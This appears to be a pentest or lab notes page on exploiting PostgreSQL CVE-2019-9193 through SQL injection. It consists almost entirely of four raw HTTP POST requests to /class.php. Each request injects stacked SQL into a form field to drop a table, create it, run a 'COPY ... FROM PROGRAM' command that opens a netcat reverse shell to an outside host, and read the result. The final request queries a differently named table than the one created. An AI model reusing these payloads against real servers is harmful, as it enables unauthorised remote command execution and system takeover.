PostgreSQL

CVE-2019–9193

Drop

POST /class.php HTTP/1.1

Host: 192.168.217.49

Content-Length: 100

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.217.49

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://192.168.217.49/class.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close





weight=123&height=123';DROP TABLE IF EXISTS cmd_exec_c; +--+-&age=22&gender=Male&email=asd%40asd.com

Create

POST /class.php HTTP/1.1

Host: 192.168.217.49

Content-Length: 109

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.217.49

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://192.168.217.49/class.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close





weight=123&height=123';CREATE TABLE cmd_exec_c(cmd_output text); +--+-&age=22&gender=Male&email=asd%40asd.com

Run

POST /class.php HTTP/1.1

Host: 192.168.217.49

Content-Length: 134

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.217.49

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://192.168.217.49/class.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close





weight=123&height=123';COPY cmd_exec_c FROM PROGRAM 'nc 192.168.45.169 443 -e /bin/bash'; +--+-&age=22&gender=Male&email=asd%40asd.com

output

POST /class.php HTTP/1.1

Host: 192.168.217.49

Content-Length: 115

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.217.49

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://192.168.217.49/class.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close





weight=123&height=123';SELECT cast(cmd_output as int) FROM cmd_exec_b; +--+-&age=22&gender=Male&email=asd%40asd.com
PreviousEasy Manual SQLiNextPortswigger

Last updated